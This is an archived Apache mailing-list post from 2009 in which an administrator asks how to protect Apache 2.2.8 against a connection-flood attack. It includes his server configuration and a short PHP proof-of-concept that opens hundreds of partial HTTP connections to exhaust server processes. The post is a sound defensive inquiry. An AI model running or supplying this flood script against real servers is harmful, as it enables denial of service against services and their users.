httpd-users mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Kanstantin Reznichak" <k.reznic...@pcpin.com>
Subject [users@httpd] Connection flood: how to protect?
Date Mon, 13 Apr 2009 17:26:05 GMT
Hello,

 

One of my servers was affected by TCP flood attack targeted to http service
(Apache 2.2.8). Short attack description: an attacker opens large amount of
TCP connections to Apache service and sends few bytes (for example, a single
"GET / HTTP/1.1" line) to every opened connection. The HTTP service opens a
new process for every such connection and waits for further input. After a
short time, HTTPd runs out of connection limit and stops responding.

 

Some of my servers are protected by state tracking firewall that protects
them against such kind of attack.

 

My question: is there possible to configure Apache HTTPd in order to protect
it against these attacks?

 

Thank you in advance.

 

 

############################################################################
#########

 

Here is the simple PHP script that demonstrates the attack:

 

<?php

 

/**

 * Proof of concept script: TCP connection flooding

 * THIS SCRIPT WAS WRITTEN FOR INTERNAL TEST PURPOSES ONLY!!!

 */

 

// "Victim" server IP address or domain name

$target_host='192.168.2.222';

 

// TCP port (normally, 80)

$target_port=25;

 

$conn=array();

 

for ($i=0; $i<500; $i++) {

  if ($conn[$i]=@fsockopen($target_host, $target_port)) {

    echo "Connection #$i opened\n";

    flush();

    fwrite($conn[$i], "GET / HTTP/1.1\r\n"); // lets send the first line and
grab an apache process

  }

}

sleep(30); // The server must be blocked until the script exits

 

?>

 

############################################################################
#########

 

Here is some local Apache data:

 

# /usr/sbin/apache2ctl -V

Server version: Apache/2.2.8 (Ubuntu)

Server built:   Mar 10 2009 18:09:51

Server's Module Magic Number: 20051115:11

Server loaded:  APR 1.2.11, APR-Util 1.2.12

Compiled using: APR 1.2.11, APR-Util 1.2.12

Architecture:   64-bit

Server MPM:     Prefork

  threaded:     no

    forked:     yes (variable process count)

Server compiled with....

 -D APACHE_MPM_DIR="server/mpm/prefork"

 -D APR_HAS_SENDFILE

 -D APR_HAS_MMAP

 -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)

 -D APR_USE_SYSVSEM_SERIALIZE

 -D APR_USE_PTHREAD_SERIALIZE

 -D SINGLE_LISTEN_UNSERIALIZED_ACCEPT

 -D APR_HAS_OTHER_CHILD

 -D AP_HAVE_RELIABLE_PIPED_LOGS

 -D DYNAMIC_MODULE_LIMIT=128

 -D HTTPD_ROOT=""

 -D SUEXEC_BIN="/usr/lib/apache2/suexec"

 -D DEFAULT_PIDLOG="/var/run/apache2.pid"

 -D DEFAULT_SCOREBOARD="logs/apache_runtime_status"

 -D DEFAULT_LOCKFILE="/var/run/apache2/accept.lock"

 -D DEFAULT_ERRORLOG="logs/error_log"

 -D AP_TYPES_CONFIG_FILE="/etc/apache2/mime.types"

 -D SERVER_CONFIG_FILE="/etc/apache2/apache2.conf"

 

############################################################################
#########

 

# cat apache2.conf |egrep "^[a-zA-Z0-9 \t<].*"

ServerRoot "/etc/apache2"

LockFile /var/lock/apache2/accept.lock

PidFile ${APACHE_PID_FILE}

Timeout 15

KeepAlive Off

MaxKeepAliveRequests 100

KeepAliveTimeout 10

<IfModule mpm_prefork_module>

    StartServers          5

    MinSpareServers       5

    MaxSpareServers      10

    MaxClients          100

    MaxRequestsPerChild   0

</IfModule>

<IfModule mpm_worker_module>

    StartServers          2

    MaxClients          100

    MinSpareThreads      25

    MaxSpareThreads      50

    ThreadsPerChild      25

    MaxRequestsPerChild   0

</IfModule>

User ${APACHE_RUN_USER}

Group ${APACHE_RUN_GROUP}

AccessFileName .htaccess

<Files ~ "^\.ht">

    Order allow,deny

    Deny from all

</Files>

DefaultType text/plain

HostnameLookups Off

ErrorLog /var/log/apache2/error.log

LogLevel warn

Include /etc/apache2/mods-enabled/*.load

Include /etc/apache2/mods-enabled/*.conf

Include /etc/apache2/httpd.conf

Include /etc/apache2/ports.conf

LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\""
combined

LogFormat "%h %l %u %t \"%r\" %>s %b" common

LogFormat "%{Referer}i -> %U" referer

LogFormat "%{User-agent}i" agent

ServerTokens Prod

ServerSignature Off

Include /etc/apache2/conf.d/

 

 


Mime
View raw message